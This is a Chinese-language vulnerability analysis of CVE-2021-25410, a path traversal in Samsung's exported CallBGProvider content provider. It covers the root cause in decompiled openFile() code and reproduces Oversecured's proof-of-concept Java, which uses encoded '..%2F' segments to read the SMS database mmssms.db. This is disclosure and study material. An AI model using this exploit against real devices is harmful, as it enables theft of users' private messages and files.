[CVE-2021-25410] [Samsung] [CallBGProvider] CallBGProvider的调用权限定义为Normal可实现任意私有文件读取

Date

Version

Description

Author

2022.11.27

1.0

完整的漏洞分析与利用

wnagzihxa1n

0x00 漏洞概述

三星手机系统的CallBGProvider定义的调用者权限为Normal可以被三方应用调用，其实现的openFile()接口存在路径穿越漏洞导致任意文件读取

0x01 触发条件

上线日期

应用名

包名

版本号

MD5

下载链接

CallBGProvider

com.samsung.android.callbgprovider

12.0.00.27

eee48a238c983450b3832683e35481eb

0x02 PoC

0x03 前置知识

0x04 Root Cause Analysis

组件com.samsung.android.callbgprovider.CallBGProvider导出，有权限com.samsung.android.callbgprovider.PERMISSION限制调用者

<permission android:name="com.samsung.android.callbgprovider.PERMISSION"/>
<provider 
        android:authorities="com.samsung.android.callbgprovider.media" 
        android:exported="true" 
        android:name="com.samsung.android.callbgprovider.CallBGProvider" 
        android:readPermission="com.samsung.android.callbgprovider.PERMISSION">
    <meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/filepaths"/>
</provider>

[1]获取安装目录下的files文件夹，[2]获取传入URI的PATH字符串，[3]取出传入URI最后一段字符串进行拼接，[4]构造[3]获取的字符串对应的File对象，[5]直接打开文件并返回

// com.samsung.android.callbgprovider.CallBGProvider
@Override  // android.content.ContentProvider
public ParcelFileDescriptor openFile(@NonNull Uri __uri__, @NonNull String s) {
    File file1;
    Log.d("CallBGProvider", "openFile: uri:" + __uri__);
    try {
        File dir_files = this.getContext().getFilesDir();  // [1]
        String __uri_path__ = __uri__.getPath();  // [2]
        if(__uri_path__.contains("images/")) {
            file1 = new File(dir_files, "images");
        }
        else if(__uri_path__.contains("videos/")) {
            file1 = new File(dir_files, "videos");
        }
        else {
            file1 = __uri_path__.contains("thumbnail/") ? new File(dir_files, "thumbnail") : null;
        }

        String s2 = file1.getPath() + "/" + __uri__.getLastPathSegment();  // [3]
        File file2 = new File(s2);  // [4]
        Log.d("CallBGProvider", "openFile: uri: path :" + s2);
        return ParcelFileDescriptor.open(file2, 0x10000000);  // [5]
    }
    catch(FileNotFoundException fileNotFoundException) {
        fileNotFoundException.printStackTrace();
        return null;
    }
}

漏洞点在于[3]调用方法getLastPathSegment()的时候，它会进行一次解码操作，所以如果我们传入content://com.samsung.android.callbgprovider.media/videos/..%2F..%2F..，方法getLastPathSegment()会先取出..%2F..%2F..并且解码最终得到../../..，[4]构造File之前并没有进行../过滤，所以此处存在任意文件读取漏洞

该ContentProvider的调用权限并没有定义，默认为Normal，所以只需要调用者声明该权限即可直接调用组件CallBGProvider

<permission android:name="com.samsung.android.callbgprovider.PERMISSION"/>

0x05 调试与利用

Oversecured实验室的PoC

try {
    getContentResolver().call(Uri.parse("content://com.samsung.android.callbgprovider.media"), "get_gradation_contents", "", new Bundle());

    File dbPath = new File(getPackageManager().getApplicationInfo("com.android.providers.telephony", 0).dataDir, "databases/mmssms.db");
    Uri uri = Uri.parse("content://com.samsung.android.callbgprovider.media/videos/..%2F..%2F..%2F..%2F..%2F.." + Uri.encode(dbPath.getAbsolutePath()));
    Log.d("evil", IOUtils.toString(getContentResolver().openInputStream(uri)));
} catch (Throwable th) {
    throw new RuntimeException(th);
}

Manifest声明权限

<uses-permission android:name="com.samsung.android.callbgprovider.PERMISSION"/>

0x06 漏洞研究

0x07 References

《Two weeks of securing Samsung devices: Part 2》

https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-2

附录：调试过程记录

Previous[CVE-2021-25397] [Samsung] [TelephonyUI] PhotoringReceiver导出存在任意文件写漏洞结合动态库加载行为可实现本地任意代码执行 Next[CVE-2021-25413] [Samsung] [Contacts] SetProfilePhotoActivity导出存在任意私有组件启动漏洞可获取ContentProvider数据

Last updated 2 years ago